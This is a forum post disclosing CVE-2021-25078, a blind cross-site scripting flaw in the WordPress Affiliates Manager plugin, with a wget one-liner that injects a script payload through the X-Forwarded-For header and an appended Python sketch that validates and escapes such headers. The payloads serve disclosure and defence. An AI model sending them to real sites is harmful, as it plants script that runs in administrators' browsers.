WordPress [CVE-2021-25078] - Affiliates Manager < 2.9.0 - Blind Cross Site Scripting (WordPress Plugin)

  • Thread starter Dark

[CVE-2021-25078] - Affiliates Manager < 2.9.0 - Blind Cross Site Scripting

Product: WordPress Plugin (Affiliates Manager < 2.9.0)

Severity: Medium (6.1)

Explanation: An unauthenticated user can send XSS payloads in HTTP headers (e.g. X-Forwarded-For: <script>alert(123)</script>) when visiting a vulnerable WordPress website. The full HTTP logs appear in the admin panel without sanitization, which causes a blind XSS vulnerability.

Quick Exploit:

As Unauthenticated User:

wget "https://wordpress-site.com/?wpam_id=1" --header="X-Forwarded-For: <img src onerror=alert(/XSS/)>" -q -O-



The XSS will be executed when the administrator visits:
https://wordpress-site.com/wp-admin/admin.php?page=wpam-clicktracking



Proof of Concept (Affiliates Manager Plugin v2.8.4):



Crafting and sending the exploit:
[Image: r8ddvo7.png]



Creating a normal request to understand which side is affected:
[Image: 4j8k7ij.png]



Finally, we got it.
[Image: kq0vs0j.jpg]
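Added example (not part of the original post and not the plugin's code): a Python sketch of the defensive side of this bug, treating X-Forwarded-For as untrusted input that must parse as an IP list, flagging stored values that do not, and HTML-escaping anything shown in a log view. The record layout and the function names are assumptions made for illustration, and the sample records are constructed.

```python
import html
import ipaddress

# Constructed sample: (request path, raw X-Forwarded-For value) pairs, as a
# click-tracking log might have stored them. Not data from the plugin.
SAMPLE_RECORDS = [
    ("/?wpam_id=1", "203.0.113.7"),
    ("/?wpam_id=1", "203.0.113.7, 198.51.100.23"),
    ("/?wpam_id=1", "<img src onerror=alert(/XSS/)>"),
    ("/?wpam_id=2", "2001:db8::1"),
    ("/?wpam_id=1", "203.0.113.9, <script>alert(123)</script>"),
]


def parse_forwarded_for(raw):
    """Return the IPs in an X-Forwarded-For value, or None if any
    comma-separated element is not a valid IPv4/IPv6 address."""
    addrs = []
    for part in raw.split(","):
        try:
            addrs.append(str(ipaddress.ip_address(part.strip())))
        except ValueError:
            return None
    return addrs


def suspicious_records(records):
    """Stored records whose header value is not a pure IP list."""
    return [r for r in records if parse_forwarded_for(r[1]) is None]


def render_cell(raw):
    """Text that is safe to place inside an HTML table cell of a log view."""
    addrs = parse_forwarded_for(raw)
    if addrs is not None:
        return ", ".join(addrs)
    # Keep the evidence visible to the admin, but only as inert text.
    return "invalid: " + html.escape(raw, quote=True)


if __name__ == "__main__":
    for path, value in suspicious_records(SAMPLE_RECORDS):
        print(path, "->", render_cell(value))
```

Validation at write time and escaping at render time are independent controls; the escaping step is the one that neutralises values already stored before a fix was deployed.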
